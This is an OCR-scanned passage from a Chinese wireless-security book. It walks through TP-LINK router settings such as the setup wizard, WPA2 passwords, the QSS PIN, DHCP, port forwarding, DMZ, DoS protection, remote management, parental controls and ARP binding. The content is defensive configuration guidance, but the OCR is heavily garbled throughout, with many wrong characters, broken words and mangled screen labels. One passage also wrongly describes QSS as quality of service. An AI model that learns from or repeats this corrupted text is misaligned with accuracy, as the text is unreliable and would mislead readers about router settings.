络 参 数 ” 中 “WAN 口 设置 ”进行 设置 。 如 果 不 清楚 使 用 何 种 上 网 方式 ， 请 选择 “让 
路 由 器 自动 选择 上 网 方式 ”。 


则 让 路 由 器 自动 选择 上 网 方式 (推荐 ) 


FFFoF (ADSL 虚 拟 找 号 ) 
了 动态 IE 《以 太 了 网 宽带 ， 自 动 从 网 络 服务 商 获 取 IP 地 址 》 
了 静态 IPF (以 太 网 宽带 ， 网 络 服务 商 提 供 固定 I 地址》 


单 击 “下 一 步 ” 按 钮 ， 进 入 “设置 
向 导 - 无 线 设置 ”对 话 框 ， 在 其 中 设置 路 
由 器 无 线 网 络 的 基本 参数 以 及 无 线 安全 
选项 ，“ 无 线 安 全 选项 ”可 以 采用 WPA- 
PSK/WPA2-PSK 方 式 输 入 密码 ， 如 下 图 
所 示 。 
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设置 向 号 - 无 线 设置 
本 向 导 风 面 设 置 路 由 器 无 线 风 4 络 的 基本 驳 歼 以 及 无 线 安全 。 


无 线 状 态 : 

SSID: TP-LINK_012F08 
信道: 

模式 : 

频段 带宽 : 


无 线 安全 选项 : 
人 强烈 推荐 开启 无 线 安全 ， 并 使 用 WPA-PSKAWPA2-FSEK AES 加 密 方 
式 。 

不 开启 无 线 安全 
® WPA-PSK/WPA2-PSK 

FSK 宫 码 : 
(8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符 》 
不 修改 无 线 安全 设置 


侈 注意 : 无 线 密码 长 度 不 能 小 于 8， 否 则 会 
有 提示 ， 如 下 图 所 示 。 


192.168.1.1 显示 : 


六 PSK 密 码 长 度 不 能 小 于 8， 请 事 新 办 入 ! 


禁止 此 由 再 显示 对 话 框 。 


单 击 “ 下 一 步 ” 按 钮 ， 即 可 完成 向 寻 
设置 ， 并 弹出 下 图 所 示 的 对 话 框 。 


设置 完成 ， 单 击 “ 重 启 ” 后 路 由 器 将 重启 以 使 设置 生效 。 


提示 : 若 路 由 器 重启 后 仍 不 能 正常 上 网 ， 请 点 击 左 人 出 “网 络 殉 数 ” 进 
入 “WAI 口 设置 ” 栏目， 确认 是 否 设置 了 正确 的 WAr 口 连接 类 型 和 拔 号 模式 。 


EE 
[step 图 单 去 “重启 ”按钮 ， 重 局 路 由 器 ， 如 


下 图 所 示 。 等 待 路 由 器 重启 完成 后 ， 就 可 
以 进行 上 网 了 。 


配置 保存 成 功 ! 
正在 重新 启动 


55% EE 


245 


二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


13.1.2 ”状态 查看 及 QSS 安 全 设置 


设置 好 路 由 器 以 后 ， 重 局 路 由 需 并 重 
新 进入 路 由 ， 此 时 可 以 查看 路 由 大 的 运行 
状态 ， 路 由 状态 给 出 了 路 由 器 运行 时 的 一 
些 简 要 信息 。 在 路 由 的 左 侧 功能 列表 中 选 
择 “ 运 行 状态 ”选项 ， 在 打开 的 界面 中 可 
以 查看 路 由 器 的 状态 ， 主 要 包括 以 下 几 个 
信息 。 

(1) 版 本 信息 。 列 出 了 路 由 器 的 当前 
软件 版 本 及 硬件 版 本 信息 ， 如 下 图 所 示 。 


当前 软件 版 本 : 


4.19.18 Build 130123 Rel. 32679n 


当前 硬件 版 本 : WE845H 2.0 00000000 


(2) LAN 口 状态 。 会 有 连 入 路 由 的 设 
备 MAC 地 址 、IP 地 址 、 子 网 掩 码 等 信息 ， 
如 下 图 所 示 。 


JIAC 地 址 ; 
IP 六 村 : 
子 网 撞 码 : 


1C-FA-68-01-2F-08 
192. 168. 1.1 
255. 255. 255.0 


(3) 无 线 状 态 。 会 有 此 路 由 配置 的 无 
线 信息 ， 其 中 包括 SSID 号 、 信 道 、 模 式 、 
MAC 地 址 等 信息 ， 如 下 图 所 示 。 


局 用 

TP~LINK O012F08 
自动 《当前 信道 1) 
llben mixed 

自动 
1C-FA-68-01-2F-08 
未 开启 


(4)WAN 口 状态 。 显 示 外 网 连接 情况 。 
如 果 路 由 器 无 法 正常 上 网 可 以 查看 此 处 ， 
排查 故障 ， 如 下 图 所 示 。 


1C-FA-68-01-2F-09 
0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 ，0.0.0.0 


动态 IP 


WAN 口 未 连接 ! 


(5) WAN 口 流量 统计 。 这 里 负责 统计 
上 网 流量 信息 ， 如 果 网 络 异 常数 据 量 过 大 
可 以 查看 这 里 的 信息 ， 如 下 图 所 示 。 
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由 AB 口 流量 统计 


在 路 由 功能 列表 中 选择 “QSS 安 全 设 
置 ” 选 项 ， 即 可 进入 “QSS 安 全 设置 ” 界 
面 。 在 其 中 可 以 对 路 由 器 的 QSS 功 能 进行 安 
全 设置 ， 如 下 图 所 示 。 


ess 能 : 已 下 


当前 PIN 码 ; 


35169857 


添加 新 设 第: 


侈 提示 : QSS， 即 服务 质量 ， 是 网 络 安 全 
机 制 的 一 种 ， 是 通过 给 局 域 网 中 的 应 用 、 
端口 或 计算 机 设 定 优先 次 序 ， 从 而 解决 网 
络 延 迟 和 阻塞 等 问题 的 一 种 技术 。 在 正常 
情况 下 ， 如 果 网 络 只 用 于 特定 的 、 无 时 间 
限制 的 应 用 系统 ， 并 不 需要 QSS， 但 是 对 关 
键 应 用 和 多 媒体 应 用 就 十 分 必要 。 当 网 络 
超载 或 拥塞 时 ，QSS 能 确保 重要 业务 不 受 延 
迟 或 丢弃 ， 同 时 保证 网 络 的 高 效 运行 。 


13.1.3 网络 参数 与 无 线 设 置 


路 由 一 般 提 供 网 络 参数 设置 ， 其 中 包 
括 外 网 设置 、 内 网 设置 、MAC 地 址 复制 ， 
同时 无 线路 由 器 还 提供 无 线 设 置 ， 如 下 图 
所 示 。 


LAN 口 1 将 
MAC 抽 址 克隆 


网 络 参 数 与 无 线 设置 的 操作 步骤 如 下 : 
step 加 WAN 口 设置 ， 主要 和 包括 WAN 口 连接 
类 型 ， 与 向 导 设 置 中 的 3 种 类 型 相同 ， 如 有 
特殊 需要 可 以 设置 DNS 服务 器 ， 否 则 保持 
默认 即 可 ， 如 下 图 所 示 。 


jyAr 口 设置 
WAt 口 连接 类 型 : 
IF 地 址 : 0.0.0.0 
子 网 搞 码 : 0.0.0.0 
网 关 : 0.0.0.0 
WAN 口 未 连接 ! 
数据 EDITV( 字 节 ) : (上 默认 是 1500， 如 非 必 要 ， 请 知 修 改 ) 
了 手动 设置 DNS 服务 器 
DNS 服 务 器 : 
备用 DIS 服务 器 ( 梧 选 
主机 名 : 
_ 单 播 方式 获取 IP 《一 般 情 况 下 请 刀 选 择 ) 


[sep 轿 LAN 口 设置 ， 主要 通过 子 网 掩 码 的 设 
置 划 分 内 网 网 段 ， 子 网 掩 码 的 设置 决定 了 
内 网 网 段 ， 同 时 也 确定 了 内 网 最 大 容纳 设 
备 数 量 ， 如 下 图 所 示 。 


本 页 设置 LAE 口 的 基本 网络 和 参数 。 
BC 地 址 : 
IF 地 址 : 
子 网 摘 码 : 


1C-FA-68-01-2F-08 


192.168.1.1 
255.255.255.0 v 


MAC 地 址 复制 ， 可 以 对 路 由 器 MAC 
地 址 进行 复制 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 对 广域网 和 tC 地 址 。 


WAC 地 址 : 
当前 管理 PCffpWc 地 址 : 
注意 : 吕 有 局 域 网 中 的 计算 机 才能 使 用 本 功能 。 


无 线 网 络 基 本 设置 ， 包 括 SSID (网 络 
名 称 ) 号 的 设置 、 信 道 设置 、 通 信 模 式 以 
及 频段 带宽 等 参数 ， 如 下 图 所 示 。 


无 线 由 络 基本 设置 
本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 


ssms: 
要 式 : 
频段 市 窜 : 
加 开启 无 线 功 能 
要 开启 SsID 广 播 
开启 hns 


无 线 网 络 安全 设置 ， 包 括 4 种 方式 ， 
第 1 种 不 开启 无 线 安全 ， 这 种 方式 除 测试 


第 13 章 ”加 固 无 线 网 络 的 大 门 下 下 


外 不 建议 使 用 ; 第 2 种 方式 使 用 WPA-PSK/ 
WPA2-PSK 方 式 ， 一 般 建 议 使 用 这 种 方式 ， 
目前 是 比较 主流 的 网 络 安全 方式 ; 第 3 种 方 
式 是 WPA/WPA2 方 式 ， 这 种 方式 同 第 2 种 方 
式 类 似 ， 只 是 加 密 方式 为 自 定 义 ; 第 4 种 方 
式 使 用 WEP 方 式 ， 该 方式 已 经 被 曝 出 存在 
严重 安全 隐患 ， 除 测试 外 不 建议 使 用 ， 如 
下 图 所 示 。 


无 线 网 络 安全 设置 


本 页 面 设置 路 由 器 无 线 R4 络 的 安全 认证 选项 。 
安全 提示 : 为 保障 网 络 安全 ， 强 烈 推荐 开启 安全 设置 ， 并 使 用 印信 
PSK/WPA2-PSK AS 加 密 方法 。 


人 @ 不 开启 无 线 安全 


© WPA-PSK/WPA2-PSK 
认证 类 型 : 
加 密 算法 : 
Ps: 
(8-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符》 
ee 
{单位 为 种， 最 小 值 为 30， 不 更 新 则 为 0) 


WPA 这 
认证 类 型 : 
加 密 算法 : 
Radius 服 务 器 IF : 
Radius 端 口 : 
Radius 密 码 : 

组 密 钥 更 新 周期: 
(单位 为 秒 ， 最 小 值 为 30， 不 更 新 则 为 0) 


| WEP 
认证 类 型 : 
WEP 密 得 格式 : 
密 钥 选择 
窗 铀 1: 所 
窗外 2: 

密 钥 3: 

密 钥 4: 


十 六 进 制 
WEP 密 钥 密 钥 类 型 
L | 
LU | 
A 
Eee 


无 线 网 络 MAC 地 址 过 滤 设 置 ， 如 果 开 
启 MAC 地 址 过 滤 ， 只 有 添加 进来 的 MAC 设 
备 可 以 正常 通信 ， 列 表 之 外 的 设备 无 法 进行 
通信 ， 这 个 只 是 相对 的 ， 后 面 会 讲解 如 果 通 
过 MAC 复 制 实现 通信 ， 如 下 图 所 示 。 


无 线 了 网络 IIAC 地 址 过 滤 设 置 


本 页 设置 JIC 地 址 过 源 来 控 钊 计算 机 对 本 无 线 网 络 的 访问 。 
JIAC 地 址 过 源 功 能 : 已 关闭 


过 源 规 由 


侍 。” 树 止 列表 中 生效 的 IC 地 址 访问 本 无 线 隐 络 
一 多 主 列表 中 生 欧 gp 地 址 访问 本 无 绪 网 络 


所 有 条 目 失 获 | 。[ 轴 际 所 有 条 甩 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


无 线 高 级 设置 ， 其 中 有 Beacon 帧 广播 
间隔 时 间 ， 移 动 设 备 通过 Beacon 帧 检测 空 
间 中 存在 的 无 线路 由 ， 通 过 设置 Beacon 帧 
可 以 达到 隐藏 无 线路 由 的 效果 ， 如 下 图 所 
示 。 当 然 ， 隐 藏 无 线路 由 也 是 相对 的 。 后 
面 会 讲解 如 何 挖 出 隐藏 的 无 线路 由 。 


丘 绑 高 汲 设置 
Beacon 时 柳 ， (40-1000) 
RT5 时 醒 : (1-2346) 
分 片 国 值 : (25E-2346) 
DT 者 秆 : [ | (4-5) 
开启 如 下 
[ad 开启 Short I 
中 开启 好 隔离 


13.1.4 ”DHCP 与 转发 规则 


DHCP 服 务 是 给 内 部 网 络 或 网 络 服 务 供 
应 商 自 动 分 配 IP 地 址 ， 给 用 户 或 者 内 部 网 络 
管理 员 作 为 对 所 有 计算 机 做 中 央 管 理 的 手 
段 。 转 发 规则 是 内 网 与 外 网 的 一 个 映射 过 
程 ， 如 下 图 所 示 。 


DHCP 服 务 慌 


转 丰 规则 
客户 端 列表 i i 
静态 地 址 分 本 UPnP 设 置 

设置 DHCP 与 转发 规则 的 操作 步骤 
如 下 : 
DHCP 服 务 ， 这 里 可 以 设置 地 址 池 的 
开始 与 结束 位 置 ， 还 可 以 设置 地 址 使 用 时 
间 、 网 关 、DNS 服 务 器 等 ， 如 下 图 所 示 。 


本 中 由 发 内 建 的 DHCE 服 务 器 能 自动 到 秆 局域网 中 香 计 算 机 8TCFZTF 协 议 。 


DHC? 服 条 器 : 
地 址 池 开 始 地 址 : 
地 址 池 结 束 地 址 : 


了 不 启用 虹 启用 
分 钟 《1 一 2660 划 钟 ， 抽 省 为 120 和 分 钟 》 


(可 选 
Cai 
(本 
(和 


备用 DI5 服 务 器 : 


[step 图 客户 端 列 表 ， 这 里 可 以 显示 出 连接 路 
由 器 的 客户 端 ， 其 中 包括 客户 端的 名 称 、 
MAC 地 址 、IP 地 址 以 及 登录 时 间 。 遇 有 网 
络 故 障 可 以 从 这 个 列表 排查 可 疑 客户 端 ， 
如 下 图 所 示 。 
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窒 户 油 列 表 


| 1 ER26X6ZS005VY17IV| 00-67-36-2F-I0-4B | 192.168.1.100 Ph1:48:21 


[step 图 静态 地 址 分 配 ， 从 这 里 可 以 对 客户 端 
IP 地 址 进行 静态 分 配 ， 通 过 静态 分 配 设 置 将 
不 再 通过 DHCP 动 态 分 配 ， 如 下 图 所 示 。 


本 妆 说 次 MCP 服务 区 的 禄 态 地 址 分 本 功 访 。 

注意 : 添加 , 山 除 条 目 或 ?已 有 条 目 做 任何 更 次 ， 乘 重 户 本 设备 后 二 能 生效 。 

[各部 条 卓 ] [全 有 条 目 主 小] [ 读 所 有 条 目 夫 效 】 [网 除 所 有 条 目 | 
[上 = 页] [下 -页 ] [用 劝 ] 


虚拟 服务 器 ， 虚 拟 服务 器 定义 了 广 域 
网 服务 端口 和 局 域 网 网 络 服务 器 之 间 的 映 
射 关 系 ， 所 有 对 该 广域网 服务 端口 的 访问 
将 会 被 重 定 位 给 通过 IP 地 址 指定 的 局 域 网 网 
络 服务 器 ， 如 下 图 所 示 。 


可 拟 服 学 淮 


虚拟 服务 器 定 头 了 广域网 服务 端口 和 局 博 汪 网 络 服务 器 之 间 的 映射 天 系 ， 所 有 对 该 广 抽 到 
服务 端口 的 访问 将 二 被 生 定 位 续 通 过 正 闻 址 指定 的 别 或 了 网 络 服务 器 。 


[也 | 服务 江 DD | z | 也 说 | 状态 | 编 旭 | 
添加 新 条 目 


侍 所 有 条 目 生 淮 


[上 = 页 | [下 = 页 | [二 萄 


[step 图 特殊 应 用 程序 ， 某 些 程序 需要 多 条 链 
接 ， 如 Internet 游 戏 、 视 频 会 议 、 网 络 电话 
等 。 由 于 防火 墙 的 存在 ， 这 些 程序 无 法 在 
简单 的 NAT 路 由 下 工作 。 设 定 转发 规则 给 
特殊 应 用 程序 实现 NAT 地 址 转换 ， 如 下 图 
所 示 。 


某 些 程序 常 要 儿 条 链接 : 如 Izternet 游 颈 ， 视频 会 说 网络 电话 等 由 于 防火 墙 的 存在 ;这 
些 程序 无 法 在 简单 9XAT 路由 下 工作 。 特殊 应 用 程序 骨 呈 某 些 这 样 的 应 用 程序 能 镶 在 RAT 吵 


由 下 工作 。 
回 配 9 击 国 证 
深圳 靳 条 目 | [ 者 所 有 条 目 生 歼 | [ 使 所 有 条 目 兴 歼 ] [是 际 所 有 系 目 


[step 四 DMZ 主 机 ， 在 某 些 特殊 情况 下 ， 需 
要 让 局 域 网 中 的 一 台 计 算 机 完全 暴露 给 广 
域 网 ， 以 实现 双向 通信 ， 此 时 可 以 把 该 计 
算 机 设置 为 DMZ 主 机 ， 如 下 图 所 示 。 


在 某 些 持 殊 情 况 下 ， 需 要 让 局 或 汉中 的 一 台 计 算 机 充 全 暴 避 给 广域网 ， 以 实 
现 观 问 通 信 ， 此 时 可 以 把 该 计算 机 设置 汶 mEZ 主 机 。 


引 不 启用 


INZ 状态 : 外 启用 


WE 主机 IF 地 址 : 


UPnP 设 置 ，UPnP 的 应 用 范围 非常 
广 ， 以 致 足够 可 以 实现 许多 现成 的 、 新 的 
及 令 人 兴 耕 的 方 委 ， 包 括 冢 庭 自 动 化 、 打 
印 、 图 片 处 理 、 厨 房 设 备 、 汽 车 网 络 和 公 
共 集 会 场所 的 类 似 网 络 等 ， 如 下 图 所 示 。 


本 页 设置 ; 避 示 证 of 的 设置 以 尺 工作 械 而 。 
当前 uPrf 状 杰 ; 开启 


当前 好 到 设置 列表 


站 | 应 赂 撞 术 | 外 和 DO | 也 议 类 型 | 内 部 类 OD | Tb 址 | 状态 | 


13.1.5 ”安全 设置 与 家 长 控制 

安全 设置 针对 一 些 可 能 遭受 的 网 络 攻击 
进行 防御 ， 家 长 控制 则 可 以 控制 未 成 年 人 浏 
虎 固 定 网 页 以 及 上 网 时 间 ， 如 下 图 所 示 。 


安全 设置 


元 螨 胰 B 官 理 


家 长 控制 


进行 安全 设置 与 家 长 控制 的 操作 步 又 


[step 国 在 路 由 功能 列表 中 选择 “安全 设置 ” 选 
项 下 的 “高 级 安全 设置 ”选项 ， 进 入 “高 级 安 
全 设置 ”界面 ， 在 其 中 可 以 进行 相关 参数 的 
设置 并 阅读 相关 注意 事项 ， 如 下 图 所 示 。 


本 让 设置 高 级 安全 防范 配置 。 
注意 : 。 ! 只 有 号 用 了 “D0s 攻 击 防范 ”， 后 面 的 设 半 才能 蚁 生效 。 
z、 这 里 “数据 包 帝 计时 间 间 司 ” 与 “ 隶 帝 工 具 ”-“ 流 旦 闹 
计 ” 中 的 “数据 包 统计 时 间 间 隔 ” 为 同一 填 ' 无 论 在 哪 一 个 模块 进 
行 修 约 都 会 槛 盖 另 一 模 
由 十 “DasTIr 击 防 沁 人 有 二 必 下 


Dss 攻 击 防 范 : 


开启 IOE-FLO0D 世 击 过 汇 : 
IMMP-FLD0D 数 据 包 阐 值 : 《5~360) 包 / 种 
开启 灿 P- 了 L000 过 小 : 

如 PF-FL00J 数 据 包 闵 值 ; 【5 一 3600) 


包 /种 


开启 TCF-SYN-8LO0D 攻 击 过 虑 : 


TCP-SYN-T7L000 数 据 包 丽 值 : 15~3600) 包 ; 种 


忽略 来 自 YAND 的 Fins: 
某 止 来 目 LAN 口 的 Fing 电 通过 此 由 坷 : 


DoS 被 禁 主 机 列表 


选择 “ 远 端 WEB 管 理 ” 选 项 ， 在 打 
开 的 界面 中 可 以 设置 路 由 器 的 WEB 管 理 端 
口 和 广域网 中 可 以 执行 远 端 WEB 管 理 的 计 
算 机 IP 地 址 ， 在 设置 前 请 阅读 相关 注意 事 


‘防范 冲击 玻 病毒 ) 
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项 ， 如 下 图 所 示 。 


远 庙 WB 管 理 


本 页 设 置 路 由 眉 的 旺 B 管 理 端 口 和 广域网 中 可 以 执行 远 端 yzB 管 理 的 计算 机 的 
IP 地 址 。 


注意 : ”1. 路 由 器 默认 的 WEB 管 理 端 口 为 80， 如 果 您 改变 了 默认 的 了 管理 
端口 【例如 改 为 88》 ， 刚 您 必须 用 “IF 地 址 :端口 ”的 方式 【例如 
http:zr192. 168.1.1:88) 才能 登录 路 由 器 执行 好 8 界面 管理 。 此 功 
能 需要 重启 路 由 器 才能 生效 。 
2. 路 由 器 默认 的 运 端 虹 了 管理 IF 地 址 为 0.0.0.0， 在 此 默认 状态 
下 ， 广域网 中 所 有 计算 机 都 不 能 登录 路 由 器 执行 远 端 WEB 管 理 ， 如 
果 您 改变 了 默认 的 远 端 是 8 管理 IF 地 址 { 重 如 改 为 202. 96. 12.8) ， 


则 广域网 中 只 有 县 有 指定 I 地 址 例如 202. 96. 12.8) 的 计算 机 才 
能 登录 路 由 器 执 行 远 端 旺 了 管理 。 如 果 将 云端 ‰EB 管 理 IF 地 址 设 为 
255. 255. 255. 255， 那 么 ， 广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 
器 执行 运 端 ‰B 管 理 。 
3. 如 果 WFB 管 理 端 口 与 “转发 规则 ”中 虚拟 服务 器 条 目的 端口 产生 
冲 罕 ， 当 您 保存 配置 时 ， 存在 端口 中 突 的 虚拟 服务 器 条 目 将 被 自动 
禁用 。 

WE 管理 应 口 : 

远 端 WE 了 管理 IF 地 址 : 


在 路 由 功能 列表 中 选择 “家 长 控制 ” 
选项 ， 即 可 进入 “家 长 控制 设置 ”界面 ， 
用 户 可 以 通过 本 界面 控制 小 孩 的 上 网 行 
为 ， 使 得 小 孩 的 计算 机 只 能 在 指定 时 间 访 
问 指 定 的 网 站 ， 如 下 图 所 示 。 


作为 家 长 ,站 可 以 通过 本 负面 进行 设置 ,控制 小 孩 的 上 交行 为 ， 使 得 小 六 外 只 能 在 指定 时 间 访 问 推定 的 网 四 。 
不 在 规则 列 去 中 的 丰 京 长 EC 掏 无 法 上 了 问 。 


启用 


有 


[Ca wm | Fs | BER 


播音 个 条 目 | | 读 所 有 条 生生 获 ] | 读 所 有 条目 失效 | [ 量 队 所 友 条 目 ] 


单 击 “增加 单个 条 目 ” 按 钮 ， 进 入 

“ 冢 长 控制 规则 设置 ”界面 ， 如 下 图 所 
示 。 本 界面 中 的 日 程 计划 基于 路 由 器 的 系 
统 时 间 ， 用 户 可 以 在 “系统 工具 一 时 间 设 
置 ” 中 查看 和 设置 系统 时 间 。 


家 长 控制 规 风 设置 
本 页 设置 一 条 家 长 控制 条 目 


本 页 面 中 的 日 程 计划 旦 于 路 由 器 的 系统 时 间 ， 您 可 以 在 “系统 工具 -时 间 讼 
置 ” 中 查看 和 设置 系统 时 间 。 

小 孩 Fe 地 址 : L | 

当前 局 博 风 中 FCRSPAC 地 址 : 

给 多 许 的 网 站 列表 一 个 指 述 | 

允许 小 孩 访问 的 网 站 域名 : 


L | 
EE 
L | 
2 
LL | 
L | 
LL | 
L | 


希望 在 册 | 些 时 修 生 小: 任何 时 间 7 


您 可 以 在 “上 网 榨 制 -日 竹 计 划 ” 中 设置 时 间 列 
志 
状态 : 
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加 固 无 线 网 络 的 大 门 “于 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


(全 注意 


13.1.6 ”上 网 控制 与 路 由 功能 


上 网 控制 可 以 对 路 由 器 的 规则 、 主 机 
列表 、 访 问 目标 以 及 日 程 计 划 进 行 设置 ， 
路 由 功能 则 可 以 添加 路 由 表 。 

上 网 控制 


主机 列表 

访问 目标 

日 程 计划 
路 由 功能 


具体 操作 步骤 如 下 : 

在 路 由 功能 列表 中 选择 “上 网 控制 ” 
选项 下 的 “规则 管理 ”选项 ， 即 可 进入 
“上 网 控制 规则 管理 ”界面 ， 在 本 界面 ， 
用 户 可 以 打开 或 者 关闭 此 功能 ， 并 且 设 定 
默认 的 规则 。 更 为 有 效 的 是 ， 用 户 可 以 设 
置 灵 活 的 组 合 规则 ， 通 过 选择 合适 的 “ 主 
机 列表 ”“ 访 问 目 标 ”“ 日 程 计划 ”， 构 
成 完整 而 又 强大 的 上 网 控制 规则 ， 如 下 图 
所 示 。 


rr 在 本 页 面 ; 向 本 由 打开 或 诗 关 闭 比 功能 ， Es 理 为 肌 簿 创 旦 ， 交 可 以 设 再 腊 舌 创 蛆 合 
计 选 撞 语 庆 的 “主机 3! 二 ”* 访问 目标 " “日 程 计 草 ”， 构成 寺 划 而 丈 强 大 的 上 同 恬 割 机 由 


开启 上 Fa 
政 内 过 小 规则 

几 巧 守 言 已 设 上 网 全 制 纲 的 3 损 包 外 许 邓 过 本 如 由 凑 

遇 凡 呈 好 襄 已 设 上 有 站 由 榴 9 下 捐 包 ， 森 止 通过 本 路由 品 


[In| i | na | 访 aB 标 | BHM | | BE 
| 


[LEE | 
涉 所 种 亲 目 生 洲 ] [ 使 所 有 有 亲 目 夫 当 | [ 机 陆 所 有 订 
匡 = 到 [下 二 | 当前 交 [L7] 页 灌 划 


选择 “主机 列表 ”选项 ， 进 入 “主机 
列表 设置 ” 界面， 在 其 中 可 以 设置 内 部 主 
机 列表 信息 ， 如 下 图 所 示 。 


本 再 设置 内 部 主机 列 志 信 息 
| DT hn | Ht 人 访  _ _ | eg 


[EEE 页 | [二 页 | 当前 第 [LV] 页 
选择 “访问 目标 ”选项 ， 进 入 “访问 
目标 设置 ”界面 ， 在 其 中 可 以 设置 访问 目 
标 信 息 ， 如 下 图 所 示 。 


当前 列 志 为 空 
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本 页 设置 访问 目标 信息 


5 RR 


| 
| | 


| 增加 单个 条 目 | | 刊 除 所 有 和 撞 目 | 
[上 = 页 ] [下 -页 | 当前 第 [iv 页 [项 助 | 


选择 “日 程 计划 ”选项 ， 进 入 “日 程 
计划 设置 ”界面 ， 在 其 中 可 以 设置 上 网 控 
制 的 日 程 计划 ， 如 下 图 所 示 。 


本 页 设置 上 网 控制 的 日 程 计划 


| nD | Fi | 时 
当前 列 直 为 宇 


增加 单个 条 目 | | 用 | 要 所 有 亲 巨 
当前 第 [1 了 ] 页 


选择 路 由 功能 列表 “路 由 功能 ”选项 
下 的 “静态 路 由 表 ” 选 项 ， 进 入 “静态 路 
由 表 ” 设 置 界面 ， 在 其 中 可 以 设置 路 由 器 
的 静态 路 由 信息 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 静态 路 由 信息 。 
目的 隐 络 地 址 


[添加 新 条 目 | | 使 所 有 条 目 和 
[上 -页 | [下 -页 | [ 吉 助 | 


13.1.7 MAC 绑 定 与 动态 DN9 


IP 与 MAC 绑 定 在 一 起 便于 网 络 管理 ， 
在 一 定 程度 上 防止 ARP 病 毒 的 传播 ， 也 可 
在 一 定 程度 上 限制 随意 算 改 IP 地 址 的 现象 。 
动态 DNS 是 指 没 有 固定 IP 的 主机 利用 动态 
DNS 服 务 ， 帮 助 主机 随 着 IP 的 改变 更 新 域名 
与 卫 的 关联 。 


IF 与 MACE 拖 定 


ARF 遇 射 表 


动态 DNS 


设置 MAC 绑 定 与 动态 DNS 的 操作 步骤 
or 
在 路 由 功能 列表 中 选择 “IP 与 MAC 
pr 选项 下 的 “静态 ARP 绑 定 设置 ” 选 
项 ， 在 打开 的 界面 中 可 以 设置 单机 的 MAC 
地 址 和 了 人 P 地 址 的 匹配 规则 ， 如 下 图 所 示 。 


藤 访 引 ? 纯 宇 记 将 


本 外 设 置 羊 机 的 mA 地址 和 亚 地 址 的 匹配 规 刚 


AIPHRE : 9 不 启用 2 启用 


卫 地 让 
[| 00-87-36-2F-I10-4B 192. 1€8. 1. 100 加 ET 


增 bp 单 个 条 目 | | 使 所 有 条 目 生 效 | | 使 所 有 条 目 失 效 | | 是 除 所 有 条 目 | | 查找 指定 条 目 | 
选择 “ARP 映 射 表 ”选项 ， 在 打开 的 
界面 中 可 以 绑 定 IP 与 MAC 的 主机 ， 也 可 时 
入 或 删除 现 有 ARP 映 射 表 ， 如 下 图 所 示 。 


| | ere-mn | | 和 证 [SSX] |W 


在 路 由 功能 列表 中 选择 “动态 DNS 设 
置 ” 选 项 ， 在 打开 的 界面 中 可 以 设置 Oray- 
com 花 生 充 DDNS 的 参数 。 这 里 需要 先 注册 
一 个 花生 完 账号 ， 如 下 图 所 示 。 

动态 DW 设置 


本 页 设置 “0rav. cm 花生 壳 DDNS ”的 务 数 。 


服务 商 馆 接 : 花生 这 动态 所 i 震动 态 志 


服务 提供 者 : 注册 

用 户 名 : | | 

启用 DDNS: 

连接 状态 : 

服务 类 型 |: 

域 避 信息 : 无 

注意 : 您 成 功 登 录 之 后 ， 需 要 先 退 出 才能 使 用 其 他 帐号 登录 。 


[保存 | [帮助 ] 


13.1.8 ”路 由 器 系统 工具 的 设置 


路 由 髓 的 系统 工具 主要 用 于 路 由 器 
的 控制 管理 ， 其 中 包括 时 间 设 置 、 诊 断 工 
具 、 软 件 升级 、 恢 复出 三、 备份 还 原 、 路 
由 重启 、 口 令 修 改 等 功能 ， 如 下 图 所 示 。 


诊断 工 上 且 
软件 升级 
恢复 出 厂 人 设置 


备份 和 载 入 本 瑟 


剖 启 路 由 器 


修改 登录 口令 


第 13 章 “加固 无 线 网 络 的 大 门 下 


进入 路 由 器 系统 工具 设置 的 操作 步骤 
如 下 : 
在 路 由 功能 列表 中 选择 “系统 工具 ” 
选项 下 的 “时 间 设 置 ” 选 项 ， 在 打开 的 界 
面 中 可 以 设置 路 由 器 的 系统 时 间 ， 用 户 还 
可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获 
取 标 准 的 GMT 时 间 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 系统 时 间 ， 您 可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获取 标 
准 的 GT 时 间 。 


注意 : 关闭 路 由 器 电源 后 ， 时 间 信 息 会 去 失 ， 当 您 下 次 开机 连 上 Internet 后 ， 
路 由 属 将 会 自动 获取 GI 时 间 。 您 必须 先 圭 上 Internet 获 取 GT 时 间或 到 此 页 设 
置 时 间 后 ， 其 他 功能 中 的 时 间 限定 才能 生效 。 


(GMT+ 08:00) 北京 ， 重庆 ， 乌 和 鲁 木 齐 ， 香 港 特别 行政 区 , 台北 
日 期 : [2006 | 年 [1 |] 月 (1_ | 日 
时 间 : [9  ] 时 [27 |] 分 [5 ] 和 名 
优先 使 用 Fr 服务 器 1: 
优先 使 用 ?FTP 服务 器 2: 


获取 GMT 时 间 | ‘ 仅 在 详 上 互联 网 后 才能 获取 GT 时 间 ) 


全 注意 : 关闭 路 由 器 电源 后 ， 时 间 信 息 会 
丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 路 由 
器 将 会 自动 获取 GMT 时 间 。 您 必须 先 连 上 
Internet 获 取 GMT 时 间或 在 此 界面 设置 时 间 
后 ， 其 他 功能 中 的 时 间 限 定 才能 生效 。 


选择 “诊断 工具 ”选项 ， 在 打开 的 界 
面 中 可 以 使 用 Ping 或 者 tracert 诊 断路 由 器 的 
连接 状态 ， 如 下 图 所 示 。 


9 ping Tracert 


(tere) 
Con-aoo 一 ) 
Tracert 串 : 数 : (1-30) 


路 由 器 已 经 就 绪 。 


选择 “软件 升级 ”选项 ， 在 打开 的 界 
面 中 可 以 通过 官方 发 布 的 软件 版 本 ， 对 现 
有 路 由 进行 软件 升级 ， 如 下 图 所 示 。 
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软件 升级 
通过 升级 本 路 由 器 的 软件 ， 您 将 获得 新 的 功能 。 
文件 名 


TFTF 服务 器 IF: |192.168.1.100 


4.19.18 Build 130123 Rel, 32879n 
WRB45H 2.0 00000000 


